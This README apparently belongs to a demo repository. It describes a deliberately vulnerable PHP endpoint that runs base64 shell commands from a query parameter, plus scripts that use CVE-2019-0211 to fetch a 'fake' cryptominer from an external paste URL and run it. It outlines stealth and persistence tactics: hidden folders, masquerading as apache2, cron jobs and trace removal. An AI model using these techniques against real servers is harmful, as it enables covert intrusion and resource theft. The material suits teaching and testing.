This repository contains examples on how to create a very basic vulnerable endpoint using Apache and PHP. Provided, are also a set of sample shell scripts to run exploits with a fake cryptocurrency binary mining software.
Fake code and binary of a "cryptominer". The binary is also pushed to [https://paste.c-net.org] at the URL: [https://paste.c-net.org/TossingRadical]
Sample exploits that consider a RCE vulnerability is possible to reach via an endpoint.
-knownvulns Provides a sample of a known vulnerability within Apache releases 2.4.17 to 2.4.38 that uses PHP 7.2.12 with Zend Framework to perform a privileges escalation of a process. The details of the vulnerability disclosed are found here: [https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html]. The official CVE is documented here: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0211].
-scripts Each script provides a sample payload that can be used to perform an attack based on the assumption of an existing vulnerable endpoint running shell scripts.
- escalateCVE2019-0211.sh
- PoC of how to use the exploit from CVE-2019-0211 to:
- Copy a cryptominer payload located externally
- Execute the payload with escalated privileges
- Payload shall execute on next LogRotate configuration (e.g. daily at 6:45am)
- NOTE: This exploit requires Zend framework installed and further updates to carpediem.php in order to work.
- PoC of how to use the exploit from CVE-2019-0211 to:
- infiniteLoop.sh
- Downloads the cryptominer payload locally to a hidden folder at /var/tmp
- Creates an infinite loop running every minute
- Executes the cryptominer using the apache2 process name
- Stops when the thread on the server-side is ended
- Payload is removed from /var/tmp/.h on next server reboot
- Downsize is that the HTTP request to execute the payload and the shell script performing the run keeps open, easily monitored
- Recommended when tracking the source IP activating the payload is not an issue (e.g. called from a private VPN), keeping locally the payload is not an issue, and is expected that sysadmins won't restart the server
- runAsCron.sh
- Downloads the cryptominer payload locally to a hidden folder at /var/tmp
- Creates a cronjob with the user running the server
- Deletes the file used to create the cronjob
- Recommended if the call to execute the payload needs to hid as a regular HTTP request, cron job execution is not blocked to the user running on the server-side, and the payload can remain on /var/tmp until next server reboot
- singleRun.sh
- Very basic payload that simply downloads a copy of the cryptominer and runs it on the server
- Similarly to the infiniteLoop.sh payload, the HTTP server request remains open at both server-side and client-side
- However, is one of the most stealhty options, since once finished the execution, removes the traces of the payload file
Sample code that runs on an Apache server with PHP and executes what is received as the query parameter 'execute' as long as it comes as a base64 string: http://localhost/vulnerable/endpoint.php?execute='MALICIOUS_PAYLOAD_BASE64'. E.g. The string 'dG91Y2ggL3Zhci90bXAvZmlsZS50eHQK', which is base64 for 'touch /var/tmp/file.txt' will create a file on the server at '/var/tmp/': http://localhost/vulnerable/endpoint.php?execute=dG91Y2ggL3Zhci90bXAvZmlsZS50eHQK. Useful to test the .sh payloads created on the exploits/scripts dir.
Sample Dockerfile that:
- Creates the Apache server with PHP using a default configuration
- Installs cron jobs support
- Copies the contents from htdocs to create a vulnerable endpoint
THE PRESENTED SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
